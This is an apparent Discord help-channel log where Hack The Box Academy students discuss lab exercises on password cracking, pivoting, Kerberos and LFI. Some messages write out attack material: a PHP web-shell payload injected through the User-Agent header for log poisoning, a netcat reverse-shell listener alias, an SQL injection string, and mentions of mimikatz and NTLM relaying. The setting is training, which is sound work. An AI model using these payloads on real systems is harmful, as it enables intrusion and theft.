#modules

Try changing vpn region

Ok, i'll try it. Thanks 🙏🏻

can someone help? currently on using hashcat to crack wireless handshakes. and im on the question1. i got hashcat running but its been like 10 minutes and still isnt cracked. am i doing something wrong

Hello, I want to enter the site.

But it gave me an error inside the username. No matter what I did, it didn't work. Please help me.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

@vernal dove ^

nevermind. the list was wrong, can someone point me to the right list to use to crack the hccapx file?

Pls help

I'm not staff, the only help you can receive is via support. The article i linked shows how to contact them

Thanks

some hints for skills assessment in Password attacks?

I obtained the credentials of ||jbetty, bdavid, hwilliam, analysed the pcap files||. I missed

Is there someone with the same issue #modules message

How can I get red team role

You need to link your hackthebox account first

erm

thats where we are 😭

I didn't use hashcat for that one, just aircrack-ng

Hi guys I need help with pass the ticket from linux section of password attacks, stuck on the last 2 sections, have root access but the host does not have proxychains.conf lol

Hello ! I have a question for module 'Attacking common services -> skills assessment (Hard) -> last question': once logged in as Fiona on the target, I've found a flag-like password (HTB_....) in the filesystem but it is not Administrator's password. I can't believe it is a dead end. I also tried to log in the DB server with Fiona's credentials, but I don't see anything useful. Can you give me a hint please ?

I'd verify access to all identified services

You're saying your attack host (VM or pwnbox) doesn't have a proxychains.conf file?

sorry i got the answer

I ment the victim host

I have to say PtT sections in Password Attacks are crazy

for the footprinting hard lab i feel like i'm doing too much. i found and copied the key locally but i need to move it to the .ssh directory i shouldn't have to be the root user to do this right?

You don't need to move the key to use it.

ok, i'm getting a public key error

Did you assign the correct permissions so you can use it?

yes

Did you rename it? You can DM what you are trying as to not spoil anything?

@west rampart are you doing Wanderer? Could I dm you?

yes i can, give me a sec

Hi @alpine mural . Send credentials in POST data. Not in URL like module

can someone help with me with skills assessment for cracking passwords with hashcat? im on the last question

Hey can I dm You? I got creds of jbetty and hwilliam I am stuck here a little push will be apperciated

nvm

Should be able to simply follow the section.

Please do not post content over Tier 0. A spolier tag does nothing.

Hello, I'm doing the Password Attacks Module and in section "Spraying, Stuffing, and Defaults", the challenge is to retrieve the MySQL credentials using a linux user (sam) to ssh to the box. The challenge seems a bit off from the content of the section. I found a zip file that I tried to crack using rockyou but found no luck. After launching Linpeas there weren't any interesting files containing passwords so my guess is the zip file. Is this the correct path or did I miss something ?

Let me see

Can someone please tell me a username so I can enter the site without giving an error?

Dm me I will help u

@cold star help me pls

What topic?

@cold star

Sorry bro I am not good in web pen only have some knowledge of network attacks

What's your username in hack the box

Vanshdhawan ig

someone can help me with NTDS.dit

Yea in password attacks module?

Yess

You have it?

Yea what help u need in it?

Can i Open dm

Yea

What’s up everyone , hope all is well … I guess I do have a question … but it’s very personal and I want to ask anyone who is online (:

This channel is for discussion of the HTB modules, not personal questions.

spamming this exact question in EVERY server you're on?

I have different questions for different server types

Idk why you’re reporting me

I'm not reporting you, I'm voicing an observation. You've posted this on every server we share

Sorry well I just got banned off a server I was part of for months but I decided to jump back in the bandwagon , sorry for assuming

Again, this is not the channel to discuss. Verify your account by reading the #rules and following the instructions in #welcome and you can access other channels where you can ask more HTB related questions and talk about other topics, this is not the channel for it.

Yeah I have to re-verify my hack the box account

Hi, Password Attacks Module got a full update or just a few sections were added?

Some were added some were removed and some were renamed

Good! Thanks!

Hey everyone, I hope you'll are having a great day!

A better place for this message would be in #general as this channel is dedicated to discussion of the HTB modules on Academy. Make sure to read the #rules and follow the instructions in #welcome to gain access to other channels.

hey people, im getting troubles with skill assessments on Password Attack, im not understanding how to pivot to first user, any hint about it?

Hey guys i'm doing the Windows Event Logs & Finding Evil module and i'm stuck at the windows event logs section with the first quesiton any help?

Yo guys i need help on pivoting skill assesment

Ive access to 172.16.6.0/24 network from my host

Though ping sweeps dont yeild anything

Neither rdp port scan yeild anything (on the whole subnet)

Password attacks module - Issues with "attacking windows credential manager", I have already uploaded a support ticket but wanted too see if anyone else here had any issues or if anyone has completed it. If so, DM me, I'd like to discuss how you did or what issues you came across.

you wont believe it but.... ligolo-ng?

I already have a route to that subnet

But i dont know what to do next (supposed to find another host in that subnet i guess)

im having the same issue

Why not try using netexec to identify hosts?

Netexec hmm

Doesnt that need credentials ?

Depends. Why not play with it a little and figure it out?

Lemme tryh

If you run into issues or are not understanding something going that route, you can DM.

Appreciate it

Let me play around and find out first

I generally learn a lot simply messing around. Plus they have a decent wiki.

Good evening, does anyone know how to get the version of a service with filtered status in nmap? firewall ctf ids/ips

Try to evade the firewall. There are options in Nmap specifically to do that

If this is related to a CTF, you are on your own and I would try Google.

I recomend looking at the nmap module

It has several ways in order to banner grab services via firewall evasion. Should you feel so inclined.

Is this the one running the .exe and getting the SHA256 hash?

Did your proxychains work before the double pivot? You can DM, so there is no spoiling this module and I am going to delete your original post as it contains content above Tier 0 and there are some folks who do this blind.

Like I said, you can DM as I don't mind helping you troubleshoot it.

I'm not looking for an answer from the CTF, I just want some light on which path to follow, I've been looking for solutions in the nmap documentation since this morning, trying to use other tools, but I'm not having success in any of the cases.

Vader gave you some great information, so I would go that route.

I'm on the password attacks module where i have to extract the onedrive password from mcharles. I used mimikatz, did the UAC bypass, and got a password but its not saying its correct.

Alright no worries. I was having issues with getting the proxy server to work through metasploit but I ended up figuring that out by just setting the srvhost option with my tun0. Just retraced my steps as well and I'm still getting the same results.

If you are certain of the answer, check for extra spaces and can try to refresh the page and resubmit it.

it starts with "proof"

So you're not seeing any connections in your output?

oh nope nvm i found it

I forgot to token::elevate

mb it just took me taking like 3 extra seconds lul

Hi everyone, I've been stuck on an issue with Session Log Poisoning in File Inclusions (LFI), I seem to be able to poison the log, but I'm quickly destroying the log somehow, getting a 500 internal error before I can make anything happen.

Does anyone know what I'm doing wrong?

In the burp request:
get request: url......?cmd=id
User Agent: phpwebshellcodehere

Make sure you escape with the proper quotes, also once you upload the shell, you no longer need to manipulate the UA, you can still abuse the poisoned log

Steps I took:
Found the nginx access.log

Intercepted with Burp, send to repeater.

Changed user agent to
User-Agent: <?php system(\$_GET['cmd']); ?>

Hit send.

Revert user agent, add ?cmd=id to my GET request
= 500 internal.
Am I doing this correct? I had the same issues when doing the actual Poisoning lesson, couldn't figure this one out dunno why

I think something is wrong with this. Lol i was literallyhaving the same issue and was gonna post. My server keeps crashing after hitting send

@vernal tapir are you saying you resolved this issue?

Nope, can’t seem to figure it out

You need to escape the user agent field in the request. First check the logs to see what I mean

If it bricks you gotta reset the target

Ahh, thank you

I think I got an idea

Do a “Test” agent and see how it responds

https://tenor.com/view/spongebob-idea-have-angel-mr-gif-22114962

Thank you Marcie

I did this. Using poison or whatever always works. Once I change it to the PHP webshell it bricks.

I rest the target and the same thing.

Reset*

What do you mean escape the user agent exactly?

You mean like erase it after hitting send the first time?

How do you escape things for xss

Similar concept applies

Oh so like "> ?

Something like that

"><?php sytem($_GET['cmd']); ?> still bricks

Step 1: check the log file

I have been trying to get this to work, i am having trouble. I have tried copying it with the + in the card number, i have tried adding dashes every 4 numbers, i have tried copying it, manually typing it in, etc. Nothing is working.

try spaces

oh yeah wtf im an idiot. + is url encoded spaces....

🤦

there have been a few times people hit this apparently so you're not alone

Im struggling i dont get anything but 200 when I send the user agent once. Its when I send it the second to get my request is when it always bricks

@fathom pendant I've also seen a video of this to see if I'm doing anything wrong and the dude just sends the php shell as user agent, clicks twice and gets his/her request.

and they do it without escaping the user agent

By check the log file, I mean do it before you do anything else. Also are you sure they didn't escape it?

Or are you misinterpreting how it's sent 😉

Yes

https://www.youtube.com/watch?v=dr3-n07x7i0

2:04

Like, for instance, them wrapping the user-agent in quotes

The log comes through the first click then for me on the second click always bricks.

¯_(ツ)_/¯

When i saw the other guy post here I was like damn maybe there is something wrong with the module.

I don't recall having issues

@fathom pendant I'm gonna work on this further. I've spent a while on it and need to step away and exercise or something lol.

@vernal tapir any luck?

Yeah I got it

Was tough but use Burpsuite to load the payload in the user agent

Use browser to refresh log after using command to read it

if it doesnt brick ur good

check dm

The impacket version of SMBclient should be able to help you out a little better

If it's too laggy/unreliable then the issue is likely connection related

It’s fast, user friendly and most importantly you don’t have to deal with that awful syntax

Need help in Pass the Certificate section
gettgtpkinit.py error oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto
i tried pip install oscrypto but nothing change.

try create a new venv python and install pip install pyOpenSSL==23.1.1 cryptography==39.0.1

me too, a few days later 🤣

was using pwnbox and the rev command was aliased to nc -lvp 9001 by default. already unset it. has this happened to anyone else's pwnbox instance??

looks like a default configuration cos that command is used a lot for receiving reverse shells

solved it, Thx

makes sense. I was just losing my mind for like two minutes before I checked for an alias lol

add module name and section name

doing the same one right now...PowerHuntShares is throwing exceptions for me if I use it exactly as described in the module (already set execution policy)

haha, thought so too ^^

welp, i suppose I still got some importing to do, someone else asked about this tool yesterday. not sure if my brain is just foggy, but I'm not seing it in the module text...

one of the few people that didn't take it to DMs for this question recommended using manspider yesterday.
imma give it another shot tomorrow, I can't get docker to run rn..

there's another tool, not sure if it's showcased or not, snaffler; ik it's showcased in the AD enum module as a way to find shares

Not sure if it's just me, but snaffler wasn't finding creds in shares, powerhuntshare didn't even find most of the shares

i haven't done that section yet so i can't comment on what i did/didn't do to solve

When you get new creds for first question, you will get access to extra shares using that creds.

Hiii

hi people, im getting this issue trying to run xfreerdp3, never had until now, ive tryied modification on /etc/krb5.conf but nothing is working. Help please

anyone? im stuck here

Hiii, I got a question in regards to the use of subbrute tool, in terms of the resolver file, my understanding is that you are supposed to put in the name server for that domain for it to work, however, for one of the module, it seems any name server seems to work fine like ns1.inlanefreight.htb``ns.inlanefreight.htb``inlanefreight.htbi tried all these 3 entries and it seem to all return the correct result, my question is arent we supposed to use the correct name server which was found using dig NS inlanefreight.htb for the resolver file for it to work? thanks!!

can anyone erase Supportteam12?

isnt spam?

thanks!

If you see something like that in the future you can ping SERIOUS RULE BREAK (put an @ before it) to get a mod/admin

how it works ping SERIOUS RULE BREAK? can u give me an example

type @SERIOUSRULE and you should see it pop up. Reply to the message with that tag and itll ping a mod.

don't do it now of course

but you should see the ping pop up if you start typing it

understood!

thanks!

someone there for questions about "Intro to C2 Operations with Sliver -> Probing the Surface" cannot establish a connection

plis

what module requires this?

yeah

issue solved. Skill Assesment from Password Attack

Intro to C2 Operations with Sliver

wrong message

Hello friends, I have a question about the Academy platform. If I buy the Gold package, will I have access to all Tier 3 modules ? (except for giving 500 boxes every month)

I'm following the instructions at "Probing the Surface" (many times) but the connection doesn't come up.
Is there something different to do, what is not discriped in the section?

can you dm what you did

Hey guys, anyone can give me a nudge on injection attacks pdf part?

Gold annual is the one that gives access

Gold monthly is a different one

can anyone help me in section Static/Dynamic analysis in module Introduction to Windows Evasion Techniques please?

i use the provided code in the section, but it doesnt work although i have hardcoded the port and ip address

In ADCS Attacks module, PKINIT section,is this RBCD attack using Rebues' asktgt correct? I thought the RBCD is about impersonating a user to access a specific service, and hence an impersonated TGS (so taught in the Kerberos Attacks module). And therefore we should be using Rebues's s4u instead of asktgt.. Can anyone help explain

Now I am talking about the monthly Gold package. Will this monthly package give me access to all Tier3 modules?

The gold subscription will allow you to unlock a module of your choice that is classified as Tier 3

If you want all access to Tier 3 modules, you can get the Gold Annual plan

Haaa, OK. I understand, thank you.

The gold annual is the only one that gives the access; the monthly only gives the cubes per month

I aalso need

Dont understand the point of Exploitation of PDF Generation Vulnerabilities when it has nothing to do with pdf exploits but LFI enumeration. Hint sais I need to find a port but it doesnt matter if I have a port to an internal app I still need the flag file name.

i'm stuck on the password attacks module. specifically the part on "writing custom wordlists and rules"
i'm not able to generate the required password. can anyone provide some help?

unless they changed that drastically, there should be a provided custom.list in the resources

I hated that section so bad

6 hours of waiting, not doing anything productive, hoping the list you generated was the correct one

burnt by not grabbing unique values

apparently they made some of the more painful sections slightly better

i've just not had the will or energy to sit down and redo the module

Same, mainly cos I'm at 90% and don't wanna have to go back, I only did the new sections

that has changed now they have a scenerio, where they provide osint about target, password policy and give a md5 hash. The 4-6 hours cracking before was just seriously maddening.

also if you do it properly you didn't need the 4-6 hours LMAO people forget about threading

I had it at -t 40

then you just have bad aussie internet

fax

An old question, but what Linux is everybody using? I used Ubuntu the other day, yeah that was a day spent trying to get it to open up for Windows Fundamentals, but I got it after asking myself some noob questions, posting and getting the 'did you do this?' which I didn't but then did it. I also spent the rest of the day trying to get Kali to open up properly, stopped that to get the sad news that my in-laws dog had two or three fatal seizures then passed away (Christ! that is so hard and painful to type, think or say-he was the bestest boy in the world) and got Kali to go this morning when I have shit to do. But seriously, which Linux does everybody use? I love deepend diving and plan to use and abuse Kali. Thanks for your input.

kali linux with everything metapackage, so I do not have to install most of the tools 😅 🏃‍♂️‍➡️

You can also use parrot, which is used in the htb pwnbox. Or a os based on arch, it can be more complicate, but therefore has also additional packages in the community package streams. But in general you can use nearly every OS it depends on your likelyhood

Hello guys, I am doing the cwee modules and I am stucked on the exercise of password reset poisoning of abusing http misconfigurations.

I tried injecting all these header with interactsh.local:PORT value:
||Host
X-Forwarded-Host
X-Host
X-Original-Host
X-Forwarded-Server
Forwarded
X-Forwarded-For||
and still in the /log page I dont see the reset token.

Hi, I think i need help to reproduce these Advanced Exfilitration with CDATA From the CBBH (Web Attacks) , i tried doing the same thing from the modules still i'm not able to reproduce me , idk what am i doing wrong here

why is zap soooo slow? On the web proxies modules and it takes for ever to intercept a request

you don't have to do the CDATA thing

there's another method from the section iirc

Error Based XXEworks for these scenarios but i was trying to replicate both of those methods taught in the module , but was unsuccessful with that anotherCDATA method. do you know like why didn't it worked?

no idea, error is the intended

hmmm, anyways it's alright . maybe i would comeback later to these and try again

Hi

Hello! Please read #rules and follow instructions in #welcome to verify your account

hello, can someone give me a little hint with the new password attack skill assessment? I feel I'm really close, but i still can't get it

sure dm

I think so

I know this is not necessareraly from a module, but can also happen in modules

does anyone know how to fix this:

┌──(kali㉿kali)-[~/admin]
└─$ impacket-getTGT machine.htb/account:<redacted> -dc-ip 10.10.10.10

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
                                                                                                                    
┌──(kali㉿kali)-[~/admin]
└─$ sudo net time set -S 10.10.10.10                                                        
                                                                                                                    
┌──(kali㉿kali)-[~/admin]
└─$ impacket-getTGT machine.htb/account:<redacted> -dc-ip 10.10.10.10 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
                                                                                                                    
┌──(kali㉿kali)-[~/admin]
└─$ sudo ntpdate -u 10.10.10.10                                                              
2025-06-12 14:15:23.979218 (-0400) +25308.218795 +/- 0.021387 10.10.10.10  s1 no-leap
CLOCK: time stepped by 25308.218795
                                                                                                                    
┌──(kali㉿kali)-[~/admin]
└─$ impacket-getTGT machine.htb/account:<redacted> -dc-ip 10.10.10.10 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

i tried net time set and ntpdate, which are the 2 methods I know

still nothing

You need to adjust your time to match the time of the DC or the machine, otherwise any attempts of Kerberos authentication will fail

already tried

https://tenor.com/view/i-saw-that-gif-14729957

sorry

Gotta ensure nothing else is changing back the time

best option is to probably use faketime

faketime "$(date +'%Y-%m-%d') $(net time -S $DC_IP | awk '{print $4}')"

This is my solution on a default kali installation

sudo timedatectl set-ntp false
sudo ntpdate -u $Machine_IP

After you are done just turn ntp on through first command replacing false with true

Im using Kali default. It Worked!!! Thank you very much

Gotta give credit to chatgpt

Hey, I am stuck at password attacks assesment I have found creds of: Betty and Hwilliam But don't know how to proceed further any hint will be really helpfull

This has been asked a ton lately. I'd try searching the channel first to see if anything has already been provided that can get you unstuck.

Okay, Thanks

You can dm me if you are super stuck but I think you should be ok with a simple search

Okay

Hey guys! Been stuck on Password Attacks - Credential Hunting in Network Shares, second question for about 6 hours... anybody willing to give me a nudge? 🙂 Thanks!

I had left that for last it was very bad

I think we have to manually read through snaffler output to get answer

Ok I'll give that a go 🙂 Thanks!

netexec spidering is something you can try.

Oh yeah, I've been using that and MANSPIDER trying to spider all different words I can think of 🙂

Are there any keywords in the question?

May I DM you?

Sure

Automatic tools don't always help...

can someone give me a hint for the Skills Assessment of Advanced XSS and CSRF Exploitation? I'm stuck

I've been trying to solve the section on XSS session hijacking for more then 2 hours now. While I am able to get the cookie, they are just wordpress_test_cookie

I keep geting this error and I dont know why

what is the module and section, and what exercise are you trying to do

Are you still receiving that cookie?

Apologize, I should have added that. This is the "Cracking Into Hack The Box" Module is Web Requests, exercise is POST

Here is my full command log if you need

try http://

On the useradmin?

you are specifying https in the URL, try http

O H

I see now XD

Thank you, such a small detail and I somehow missed it completely

Anyone know how to fix this?

Maybe check if chromium is installed, if not install it?

You should be able to choose which browser to use in burp, try see if that doesn't help 😄

hy anyone completed injection module

which injection ?

injection Attacks

didn't

i don't even know about it iam in cbbh path

You can use any browser with burp with proxy setup and importing cert, burp has its own browser(chromium) in which everything is setup. The op has posted about that built-in browser feature.

can anyone help me in injection Attacks
injection Attacks module

yep, Manspider finally worked for me! Thanks for the link to the docker resource. I was running on PwnBox, I think I ultimately just had to restart the docker service and use sudo for some permission thing that wasn't mentioned in the example. Will need to spend some more time wrapping my head around what I'm actually doing there, but got the exercise solved at least 🙂

thanks, yeah that was mentioned in that section too, I don't recall why it didn't do the trick for me yesterday

cat /etc/passwd | cut -f1 -d: guys I am doing LInux Privilege Escalation and I didn't understand from the section write up what does this command do?

list all passwords? used on the system

???

passwords not stored in passwd

theoretically one of them can be used to become root right?

this command just lists users

no no but i found out how to process it thanks for you help 🙂

What is the trick to get impacket-ntlmrelayx to capture the CSR and create a .pfx file in Password Attacks/Pass the Certificate I am getting nothing, any help appreciated.

You need to use ntlmrelayx to listen for inbound connections and relay them to the web enrollment service. Then you need to find a way to coerce the DC to attempt authentication against your attacker host.

guys hello give some tips how to solve linux privilege escalation eviroment enumeration section?

nothing in the section itself gives information how to get shell or how to find this file

even the command sudo -l works from time to time

Thanks for response, I am listening and relaying with ntlmrelayx to the CA server at the location specified in the module and I am attemtping to authenticate through the DC with RPC using provided credentials to my own attack box with printer bug. I am using the commands in the module substituing the IP's provided and my own box IP.

If you did everything correctly, ntlmrelayx will generate the .pfx certificate, if it did not work, your syntax is wrong somewhere. maybe mixed ips or similar.

You may need to run it as root.

I got a base64 iirc that I needed to pipe to OpenSSL

omg

thanks guys im dumb FW issues

Damn those FW’s

who needs em anyways

hey how long did you guys take for the footprinting -> dns module.
im stuck at question 4 with trying now the 5th different wordlist.. sitting here 2 hours just to get the one entry ..
i can see it happen in a real engagement but come on really now?

I recall that one being tough

Try a fierce wordlist

i did.. nothing. i now am thinking im doing something wrong maybe

Subdomains of Subdomains is the other one unless they changed it

@cerulean hinge careful revealing spoilers like passwords

Those are password the module give us

It's still a module spoiler

oh ok, what was the issue ?

With your post? Just the spoiling of passwords and such.
The issue you're having in the module? Don't know

Yeah I mean with my post. How is it a spoiler if the passwords are within the module itself ?

It falls under "module content," as per the channel description - do not spoil module content above tier 0

Ok sorry then

Hello,
I'm stuck at the "Unconstrained Delegation - Users" part of the "Kerberos Attack" module.
I manage to get the ccache file for the DC machine account however I can't use it to perform anyfurther attack from my kali.
Here is for example the message I get when trying to perform a DCSync : "KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)".

Can someone know why please ? Thank you

Did you add the ip and relevant lines in your /etc/hosts

Yes I added the IP + domain & machine name.domain

Did you also add the machine name?

I.e. domain machine.domain machine

I will add and try

it's not working. I think my issue is on how I setup the krbrelayx.py. I tried to do it without the hash (which seems to work at it decrypt the TGT) but not sure about it.

Guys

What to do if I completely fucked up after watching MrRobot

Like it fully changed my mind I can’t understand how to fix it now

This has nothing to do with htb academy

Ye I know it

Ntlm relay... relays the credentials, passing the hash is just using the the hash as a form of logging in

Then it doesn't belong in this channel, read and follow instructions in #welcome to access more of the server

Relaying is what's used in some instances where the hash may not be able to be used or you need to do some other stuff. Relays utilize the whole ntlmv2 hash not just the lm:nt hash. This includes the timing and stuff embedded into the hash

okay so im missing something here about the dns and whole transfer zone thing.
i did dig axfr on the base domain and got some ips
and now i was supposed to run a bruteforce on every single subdomain till i get the answer that i need and with possibly whatever many different wordlists? i mean that cant be right? am i missing something?
i got the answer online and sadly now got spoilered but im also kind of glad i was. i dont know if i wouldve ever came on the idea to do that.
i did try to bruteforce the main domain all the time with different word lists..

Yeah it's under subdomains, you can narrow down the list a bit btw. You already can transfer to one of the subdomains, so cross that off.

You can also do a little loop to run through the subdomains and wait

Also: always start small then go bigger

but how could i have known i need to brute the subdomains. like i feel like that wasnt communicated in the page or maybe im missing something im not sure.
i dont understand how i was supposed to know that i need to do that.
i dont think im fully understanding dns and the whole transfer thing .. its like i had no clue at all

Guys who has done LINUX PRIV ESCALATION how did you find flag in enviroment enumeration section?

Think of it this way: if you can't find the info on the surface, dig deeper

Also I've found utilizing the bruteforce tool also misses the important subdomain to start on as opposed to using dig

Hii

hm i guess. i dont know. its not intuitive to go to like a sub sub domain. i constantly thought i need to just find a "normal" sub domain.

And that's generally not how dns works. You're making the assumption that it's like a web server that you just need to fuzz for the right thing on the onset. As opposed to it being recursive

yeah like i said i dont think im really understanding dns yet. i read the page like 3 times i dont know

you don't need to have too much in-depth knowledge of it ¯_(ツ)_/¯

Just the basics of searching records

Hello?

you mean like using dig and being able to read the records ?
and now i learned with you that i also need to maybe brute the sub domains so is that enough to safely go next module or should i keep at it?

I tried to verify the bot says it failed

Thats enough just keep those things noted

Hey there, any idea why the application is not responding?

App not responding is normal for hackster. Run the command again in #bot-commands

i did 3 times i don't want to get banned for spamming or something

:0

You won't get banned I'm asking so I can see at fresh error in the log

okay i will again

So I can sort it out. Dm me so we're not flooding the channel

hello

hello

has anyone done the introduction to bash module ???

i was in the seciton of "comparison Operators" doing the excersise

I think im close to the answer but I dont know what I am missing

I can DM with the answer or the code i have

You can DM what you have.

Guys has anyone done Linux Priv Escalation?

Many people have

ey, hello, im doing a scanner with PCredz and i dont found the credit card numer. im in attacks password module section Credential Hunting in Network Traffic

nothin, i found it

I've generated a new VPN pack, restarted the machine, still nothing

Had to use the solution because I was so confused

Hey, I am stuck at password attacks assesment I have found creds of: Betty and Hwilliam and an Admin local account But don't know how to proceed further any hint will be really helpfull, I tried a lottttt of things...

Okay scrolling through message history it seems like this box has had issues in the past, I'll just skip this
Thank you

Hey awesome peeps, can anyone help me figure out why ZAP isn't loading the HUD in Firefox on Pwnbox?

I checked the box to enable it, but no dice

You can dm for hint

@graceful urchin don't share screenshots with answers

nm i just didn't use the hud lolz

how did you find it? I only managed to find it with wireshark

fair point sorry

i do it with wireshark, Pcredz only found the user, the password and SNMPv2 community string

Yeah same, weird because Pcredz supposedly finds credit card info also

yes, its supposed to do it

You can figure that out with a whoami. I'm going to delete the screenshot since it is from a higher tier module. If you want you can DM about this one.

by the way did they update every page in Password Attacks?

hello i have synchro problems with the clowk skew too great for kerberoast no way to get it out anyone have an idea? thanks

Not every page, but plenty of them

They even added some sections

Hey yall, pretty basic question here. I'm doing the web app enumeration and I'm learning about crawlers. In what context would I use a crawler over a traditional directory brute forcer? Is the main benefit of the crawler that it'll go deeper into the file system whereas the directory brute forcer won't?

faketime

Crawlers look at the page itself

Ahh so there where 3 that appeared as not completed that I have done but there are others that I should go over

i think you can also use ntpdate or something

Bruteforcers just look for predefined words from the wordlist, whereas a crawler looks all over the page and clicks links on the page

so it basically makes the wordlist more accurate to the target

Crawlers don't use wordlists

Yeah I misspoke, I meant like morally

?

@fathom pendant thanks a lot

from a pure math background, we'd say something is morally true if it makes sense but kind of handwaving it

and here i meant it like "oh, crawlers have a more accurate wordlist because they're taking directly from the page rather than using a dictionary"

it's not exactly correct but it's like handwave-y correct

They just serve different functions

yup

For example an /admin/ endpoint likely won't be found by a crawler if it's set up properly

And a /testtesttest111/ endpoint wouldn't be found by a bruteforcer but if it's referenced on the page it'll be found by the crawler, right?

Yep

Generally if it's linked it'll go to it

But crawlers may be written to check things like that

faketime "$(date +'%Y-%m-%d') $(net time -S 10.10.11.72 | awk '{print $4}')" zsh still always the same KRB_AP_ERR_SKEW(Clock skew too great) :

😦

You can DM what you are running this with.

If you need any more help with this, the #1380967904429871275 is the channel for questions related to that box.

Hello all, looking forward to dive deeper into cybersecurity. Currently finish my AAS. Information Technology - Programming (ETA August 2025) & have decided to pivot and get more into cybersecurity. Found myself not really enjoying full on coding. Am i crazy for pivoting lol fyi im 30yrs old

you can dm if you want

<@&861185840277487616>

does silver or gold in the academy open up additional VPNs? I'm in asia pacific and latency for some of the RDP-based modules is painful

no; there's no different vpns

is it common for LFI vulnerabilities to cause problems with the server?

LFI alone: not too high risk, have sensitive files readable? Higher risk, can attacker also write to some place? (Eg logs etc) oh no~ RCE

@waxen totem thanks. only reason I asked is because my target kept becoming unreachable.

Not likely but if your LFI involves a lot of requests it can DDoS

I suppose these don't really need to be the most resource heavy containers/vms.

Id swap VPNs if your connection keeps dropping

hi

Not here.

what?

it says 'commandnotfound'

box Tier 2 : ARCHETYPE

Best to ask for help in #boxes

When I test below regex with "^.@[A-Za-z]\.[A-Za-z]*$" regex101 shows no match found but in the course 5 matches found.
How is the course content shows 5 matches and on the site zero?

course content:

you have two slashes instead of one, it's looking for a slash in the middle

Nice catch

Hey how can I hunt my first bug Bounty pls help

From where should I start from

I know the basics

@thin citrus

@fathom pendant

@jaunty anvil I have never done bug Bounty hunting

Not a correct channel to ask about it.

This isn't the channel for bug bounty discussion, please don't randomly ping people. This channel is for discussion of the HTB modules.

@jaunty anvil don't ping random people

@jaunty anvil Please read the #rules and follow the instructions in #welcome to gain access to most channels.

Then where is it pls help

Doing win privesc {Windows Built-in Groups}
when trying to use this command '$key = Get-BootKey -SystemHivePath .\SYSTEM' gets below error
(i folllowed the Module Walkth and got this error) (i got the flag was just doing it for practice)
Get-BootKey : Requested registry access is not allowed.
At line:1 char:8

• $key = Get-BootKey -SystemHivePath .\SYSTEM

•    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : OpenError: (:) [Get-BootKey], SecurityException
  • FullyQualifiedErrorId : GetBootKey_OtherError,DSInternals.PowerShell.Commands.GetBootKeyCommand`

what tool or site is this?

@wooden seal https://regex101.com/ but it was the escape slash

Hello,
I believe there is an issue with Attacking Windows Credential Manager section on Password Attacks module. I cannot access the target, it is just not pinging back. I have tried switching servers, I have tried using VPN as well as using pwnbox, it still doesn't work. Could someone double check if this is my issue or if the lab is broken? Appreciate it

sometimes windows targets may not respond to pings, did you try to RDP?

Never came across this issue, thank you I am just dumb 🙃

hey

where can i share some idea for the pwnbox ?

/feedback

this channel is for discussion and help regarding the academy modules

thanks !

if you want access to more of the server -> #welcome

Hello

I'm here to learn from scratch, can I learn something?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@cloud mural 👆

Thank you 🐧

anybody else's VM freezes when running ZAP active scan, it get's to 39% and then freezes the whole VM

Hello everyone 😃

Nevemind, fixed it

Hi, I'm a beginner.
Can someone explain how the PE works on the Tombwatcher machine?
Thanks ; )

For boxes, please ask in #1380967904429871275 or #boxes

if you cant access mentioned channels, read and follow #welcome

okay, thank you

Hello, I am struggling on the LLM Output skill assessment, can i ask a little question to someone who finished it ?

sure @solemn vale

ahh I see, I thought it was a UAC value that was being referred to as "non default privilege". Thanks man!

there is a problem in the android fundamentals - skill assesment, the second question about the UID of the application com.android.settings

please post in #1234357888114364508

English only @languid remnant

and please dont spam

Okay

Don't advertise @languid remnant

read #rules

Yes there are dozens of problems in that module and I reported it many times to get improved

if you have some questions contact me I will try to guide

hey hii everyonee

hello, please read #rules and #welcome

still need help with this

Not everything in the sections can be reproduced on a target

thanks, i was stressing thinking i am doing something wrong lmao

I had the same issue few days ago 😅

did ya do the UAC bypass one? Was the flag just on the desktop? 😂

it mentions to do X Y Z and if you are done, just read the flag

I mean I skipped all the "check the privs" "run the dll" cos I knew I could just skip straight to the path loaded dll as system

I am at the section pillaging now

Grace's password is what you are

omw to speedrun that now thanks for the leak

can someone help me with SQL injection inside the signup functionality, tried all field with a basic injection '//or//1=1-- and on the email with@bluebird.com. Need to write file.

SQL Injection fundamentals module?

it is time to update the new android static analysis modules xD

because on APKCombo it is XAPK for arm and it will not work on the emulator x86_64

between the android studio part where it uses old UI and some others stuff, it became debugging the course xD

Is it just me, or do a lot of the HTB academy skill checks involve doing things that have zero relevance to what they're teaching in the actual module you're on? It's pretty frustrating. You'll read a mind numbing amount of information thinking you're about to apply that in the skill check, only to realize that passing the check involves something that hasn't even really been taught

Does someone has this too on CAPE Module: https://academy.hackthebox.com/module/263/section/3092 ```powershell
PS C:\Tools> .\SharpWSUS.exe inspect

/ || | __ _ _ __ _ \ \ / / || | | / |
_ | ' \ / _` | '| ' \ \ /\ / /_ | | | ___
) | | | | (| | | | |) \ V V / ) | || |) |
|/|| ||_,|| | .__/ _/_/ |/ ___/|/
||
Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server
Something went wrong, unable to detect SQL details from registry.
Something went wrong, unable to detect SQL details from registry.

[!] Unhandled SharpWSUS exception:

System.NullReferenceException: Object reference not set to an instance of an object.
at Connect.FsqlConnection()
at SharpWSUS.Commands.Inspect.Execute(Dictionary2 arguments) at SharpWSUS.Args.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at SharpWSUS.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)```

I reverted the lab twice now, the powershell windows has been executed with admin privs (also tested a window without admin privs)

Skill assessment, Web proxies
Can I not use ZAP for this?
The hint mentions burp

Every exercise is solvable from ZAP, but I needed to install script for to hex payload processor, I think it was this one?

It's possible with ZAP cos I was already familiar with burp I did the entire module with ZAP

